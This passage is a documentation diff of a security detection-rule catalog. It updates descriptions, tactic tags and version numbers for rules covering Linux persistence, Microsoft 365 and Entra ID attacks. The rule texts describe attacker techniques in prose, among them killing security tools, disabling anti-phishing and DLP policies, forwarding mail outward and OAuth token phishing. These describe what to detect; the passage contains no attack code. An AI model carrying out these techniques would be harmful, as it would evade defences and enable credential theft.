download remote payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11 -|<> |This rule detects the extraction of an initramfs image using the `cpio` command on Linux systems. The `cpio` command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4 +|<> |This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |5 |<> |This rule detects the unpacking of an initramfs image using the `unmkinitramfs` command on Linux systems. The `unmkinitramfs` command is used to extract the contents of an initramfs image, which is used to boot the system. 
Attackers may use `unmkinitramfs` to unpack an initramfs image and modify its contents to include malicious code or backdoors, allowing them to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4 @@ -1066,7 +1082,7 @@ and their rule type is `machine_learning`. |<> |Adversaries may collect keychain storage data from a system to in order to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |113 -|<> |This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |3 +|<> |This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 |<> |Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |314 @@ -1162,7 +1178,7 @@ and their rule type is `machine_learning`. |<> |This rule identifies successful logins by system users that are uncommon to authenticate. These users have `nologin` set by default, and must be modified to allow SSH access. Adversaries may backdoor these users to gain unauthorized access to the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: System], [Resources: Investigation Guide] |None |4 -|<> |Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. 
|[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: SharePoint], [Data Source: OneDrive], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |3 +|<> |Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: SharePoint], [Data Source: OneDrive], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |4 |<> |Detects successful Microsoft 365 portal logins from rare locations. Rare locations are defined as locations that are not commonly associated with the user's account. This behavior may indicate an adversary attempting to access a Microsoft 365 account from an unusual location or behind a VPN. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |7 @@ -1214,53 +1230,53 @@ and their rule type is `machine_learning`. |<> |This rule detects the creation of potentially malicious files within the default MOTD file directories. Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" directory. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |15 -|<> |Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. |[Domain: Cloud], [Domain: SaaS], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |106 +|<> |Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. 
|[Domain: Cloud], [Domain: SaaS], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |107 -|<> |Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing policies increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. 
|[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. 
|[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |209 +|<> |Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |210 |<> |In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator / Company Administrator is a role that enables users to have access to all administrative features in Entra ID and services that use Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Adversaries can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |211 -|<> |Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. 
Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources in Microsoft 365 on-behalf-of the user. |[Domain: Cloud], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |4 +|<> |Identifies a Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources in Microsoft 365 on-behalf-of the user. |[Domain: Cloud], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |5 -|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |210 |<> |Detects potentially suspicious OAuth authorization activity in Microsoft 365 where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |2 -|<> |Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. 
Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 +|<> |Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 -|<> |Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |209 +|<> |Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |210 |<> |Identifies when a user creates a new inbox rule in Microsoft 365 that deletes or moves emails containing suspicious keywords. Adversaries who have compromised accounts often create inbox rules to hide alerts, security notifications, or other sensitive messages by automatically deleting them or moving them to obscure folders. Common destinations include Deleted Items, Junk Email, RSS Feeds, and RSS Subscriptions. This is a New Terms rule that triggers only when the user principal name and associated source IP address have not been observed performing this activity in the past 14 days. |[Domain: Cloud], [Domain: SaaS], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 -|<> |Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |210 +|<> |Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. 
|[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |211 -|<> |Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |210 -|<> |Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |209 +|<> |Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |210 |<> |This rule correlate Azure or Office 356 mail successful sign-in events with network security alerts by source.ip. Adversaries may trigger some network security alerts such as reputation or other anomalies before accessing cloud resources. 
|[Domain: Cloud], [Domain: SaaS], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Rule Type: Higher-Order Rule] |None |3 @@ -1274,25 +1290,27 @@ and their rule type is `machine_learning`. |<> |An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike] |None |218 -|<> |Identifies concurrent azure signin events for the same user and from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 +|<> |Identifies concurrent Azure sign-in events for the same user and from multiple sources, where one of the authentication events has suspicious properties often associated with DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 -|<> |Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 +|<> |Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |107 -|<> |Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. 
Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 +|<> |Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |2 -|<> |Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 +|<> |Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 -|<> |Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |108 +|<> |Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. 
While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |109 -|<> |Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |217 +|<> |Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources on-behalf-of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |218 -|<> |Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attemopt to brute-force TOTP codes by generating several sessions and attempt to guess the correct code. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attempt to brute-force TOTP codes by generating several sessions and attempting to guess the correct code. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |5 -|<> |Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. 
